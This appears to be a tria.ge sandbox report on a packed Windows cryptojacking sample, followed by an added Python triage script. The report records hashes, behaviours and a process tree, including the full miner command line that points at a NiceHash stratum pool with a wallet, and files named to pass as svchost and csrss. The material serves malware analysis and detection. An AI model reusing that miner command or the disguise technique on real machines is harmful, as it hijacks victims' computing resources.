Analysis

  • max time kernel
    120s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31/05/2024, 15:06

General

  • Target

    876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe

  • Size

    1.6MB

  • MD5

    876cf2c8f925c3a8a29d254f34ca1d0d

  • SHA1

    b6e4acdc4fa514a9d879878249c223e946114e09

  • SHA256

    a65d885d904cc0f2d2452d4c2b8c58db5eb04153e45a3ce081d3f50d767e5e22

  • SHA512

    25fce95c3722da3bc992762f2ba79db2e966870c0b11cc4701a7e1fc66f9c75da34f8521e70e01e518141edb6949c6a1a754520a03292f857629825fdefa78ee

  • SSDEEP

    49152:Ae6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AeD9WuvtY7pHMD

Score
7/10

Malware Config

Signatures

  • Checks computer location settings (2 TTPs, 2 IoCs)

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file (1 IoC)
  • Executes dropped EXE (1 IoC)
  • VMProtect packed file (4 IoCs)

    Detects executables packed with the VMProtect commercial packer.

  • Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4568
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\ProgramData\Windows\csrs.exe
        "C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 19e8n98DfHt3un2eEQuYCZGron5z3dBZiZ -p x -t 10
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:3544
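The process tree records the whole infection chain: the sample writes svchost.VBS and csrs.exe under C:\ProgramData\Windows, WScript.exe runs the script, and the script starts csrs.exe with stratum pool arguments. The Python below is an added example written for this page; it is not tria.ge code and not part of the sample. It re-parses the three recorded command lines, pulls the pool, wallet and thread count out of the csrs.exe arguments (reading -o/-u/-p/-t in the XMRig-style sense, which is an assumption; the report only records the raw command line), flags the two name-masquerading tricks visible in the tree (a .vbs named after svchost and an executable named csrs.exe, one letter short of csrss.exe, both outside System32), and decodes the numeric prefix of the dropped 1717168022_log.txt on the assumption that it is Unix seconds. All helper names are mine.

```python
"""Re-parse the process tree recorded in the report (added example, not tria.ge code).

Checks performed on the three recorded command lines:
  * csrs.exe arguments are read as XMRig-style switches (-o pool, -u user/wallet,
    -p password, -t threads); that mapping is an assumption, the report only
    records the raw command line;
  * names that masquerade as Windows binaries (svchost.VBS, csrs.exe) running
    outside System32/SysWOW64 or from ProgramData;
  * the numeric prefix of the dropped 1717168022_log.txt, assumed to be Unix
    seconds, decoded to UTC.
"""
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional
from urllib.parse import urlparse

# (pid, parent pid, image path, command line) copied from the report's process tree.
PROCESS_TREE = [
    (4568, None, r"C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe"'),
    (2928, 4568, r"C:\Windows\SysWOW64\WScript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"'),
    (3544, 2928, r"C:\ProgramData\Windows\csrs.exe",
     r'"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355'
     r" -u 19e8n98DfHt3un2eEQuYCZGron5z3dBZiZ -p x -t 10"),
]

# Stems of binaries that belong in System32; the same stem elsewhere, or with a
# script extension, is a masquerade. "csrs" is the one-letter-short csrss lookalike.
SYSTEM_STEMS = {"svchost", "csrss", "csrs", "lsass", "winlogon", "wscript", "cscript"}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
BTC_P2PKH = re.compile(r"1[1-9A-HJ-NP-Za-km-z]{25,34}")  # base58 alphabet, leading "1"


def split_cmdline(cmdline: str) -> List[str]:
    """Split on whitespace but keep double-quoted paths whole, with the quotes removed."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def base_stem(path: str) -> str:
    """Lower-cased file name without directory or extension."""
    name = path.rsplit("\\", 1)[-1].lower()
    return name.rsplit(".", 1)[0] if "." in name else name


def parse_miner_args(argv: List[str]) -> Optional[Dict]:
    """Return pool/wallet/thread fields if argv carries a stratum pool URL, else None."""
    opts = {argv[i]: argv[i + 1] for i in range(1, len(argv) - 1) if argv[i].startswith("-")}
    pool = urlparse(opts.get("-o", ""))
    if not pool.scheme.startswith("stratum+"):
        return None
    threads = opts.get("-t", "")
    return {
        "transport": pool.scheme,                   # stratum+tcp
        "host": pool.hostname,
        "port": pool.port,
        "pool_label": pool.hostname.split(".")[0],  # NiceHash encodes the algorithm here
        "wallet": opts.get("-u"),
        "wallet_is_btc_p2pkh": bool(BTC_P2PKH.fullmatch(opts.get("-u", ""))),
        "password": opts.get("-p"),
        "threads": int(threads) if threads.isdigit() else None,
    }


def masquerade_findings(image: str, argv: List[str]) -> List[str]:
    """Flag system-binary lookalikes outside trusted dirs and scripts launched from ProgramData."""
    findings = []
    if base_stem(image) in SYSTEM_STEMS and not image.lower().startswith(TRUSTED_DIRS):
        findings.append(f"system-binary lookalike outside System32: {image}")
    if image.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
        for arg in argv[1:]:
            if not arg.lower().endswith(SCRIPT_EXTS):
                continue
            if arg.lower().startswith("c:\\programdata\\"):
                findings.append(f"script host executing from ProgramData: {arg}")
            if base_stem(arg) in SYSTEM_STEMS:
                findings.append(f"script named after a system binary: {arg}")
    return findings


def decode_epoch_name(path: str) -> Optional[datetime]:
    """Decode the <epoch>_log.txt prefix (assumed Unix seconds) to an aware UTC datetime."""
    m = re.search(r"(\d{10})_log\.txt$", path)
    return datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc) if m else None


def triage(tree=PROCESS_TREE) -> Dict:
    """Walk the tree once; collect masquerade findings and the first miner command line."""
    out = {"miner": None, "findings": []}
    for pid, ppid, image, cmdline in tree:
        argv = split_cmdline(cmdline)
        out["findings"] += [f"pid {pid} (parent {ppid}): {f}" for f in masquerade_findings(image, argv)]
        miner = parse_miner_args(argv)
        if miner:
            out["miner"] = dict(miner, pid=pid, parent=ppid)
    return out


if __name__ == "__main__":
    result = triage()
    for line in result["findings"]:
        print(line)
    print("miner:", result["miner"])
    print("log created:", decode_epoch_name(r"C:\ProgramData\Windows\1717168022_log.txt"))
```

Run stand-alone it prints three findings (the ProgramData script, the svchost-named script, and csrs.exe outside System32), the miner fields with host cryptonight.eu.nicehash.com, port 3355, ten threads and a user field shaped like a Bitcoin P2PKH address (the format NiceHash pays out to; the check is a shape test only, not a checksum), and a log creation time of 2024-05-31 15:07:02 UTC, which agrees with the recorded submission time. The same functions can be pointed at Sysmon event 1 or EDR process-creation records by substituting their image/command-line fields for PROCESS_TREE.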

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Windows\1717168022_log.txt

    Filesize

    1KB

    MD5

    64f8f6eac3dc0c9fedff18d20aab3e44

    SHA1

    2a8a993f40c3feb053cf80cffb630315cd242342

    SHA256

    ff91c76c8c2e0e3d30431e522c07e27295376b565480748d1e0e7f2641af6d3e

    SHA512

    5d6810fb3b56eab08617338cb21791322a5aeb0f517b59bd8c7bbd2ad06f01903c551fa07dd35c252334d70eadebf24239669691eb10bf4b77d4ef23e9688116

  • C:\ProgramData\Windows\1717168022_log.txt

    Filesize

    3KB

    MD5

    de7c2fd6410b41fe9dc691128bda00f0

    SHA1

    62412cf8b84f29be852cdf710b694af924f4345c

    SHA256

    fad402a54293e23785c2f44cdb22dc86c8d60d83a574bc53ce56442ad14fd68d

    SHA512

    df625533f850a2c97f6464540d03b632312472415eb590099ea8a63a4769f8efac70b5c035ad32b3897259a4cfb2580704b8d600997a9af53c772845a96c6e0f

  • C:\ProgramData\Windows\1717168022_log.txt

    Filesize

    4KB

    MD5

    3217480c90b0366a3621c70ee2f50585

    SHA1

    60f759c3fc66312dd7a596732a34920e2d600874

    SHA256

    f437e4d76784bb3281e7f03e15d3154ecc9429cc2b801272f662a4521f1ea78d

    SHA512

    a9f6d57db9de37b876ae7e2e629e4abe7bd141999f0bcd4976411ec0bd9170b8c92b8c0b8b8aa8445bafbecf4ac201bc498321bf196c38095a9834bdad9663a7

  • C:\ProgramData\Windows\csrs.exe

    Filesize

    1.4MB

    MD5

    e3427d9f439aebefa3d9c299e2a94af3

    SHA1

    ffff4672790378677ec30d3634fc593c10dfd37e

    SHA256

    7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba

    SHA512

    a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b

  • C:\ProgramData\Windows\svchost.vbs

    Filesize

    1KB

    MD5

    96d540f4b7c1b7074e5f135432a3592d

    SHA1

    c380a1b024dcb58296a30c258d294ca3249d6f08

    SHA256

    44af45c732ab1f051e9c849086af7384c78fe7faaa2049c844b3b014a5af5e70

    SHA512

    d3589dff318c752a3913fd489f3a1c6b6e1898f051d97cb6e546d3d4a8339732992705eaa1af27d29e8c41eb7a229ea597df406be5a312d2070226f503be514b

  • memory/3544-11-0x0000000000090000-0x00000000003FB000-memory.dmp

    Filesize

    3.4MB

  • memory/3544-12-0x0000000000090000-0x00000000003FB000-memory.dmp

    Filesize

    3.4MB

  • memory/3544-31-0x0000000000090000-0x00000000003FB000-memory.dmp

    Filesize

    3.4MB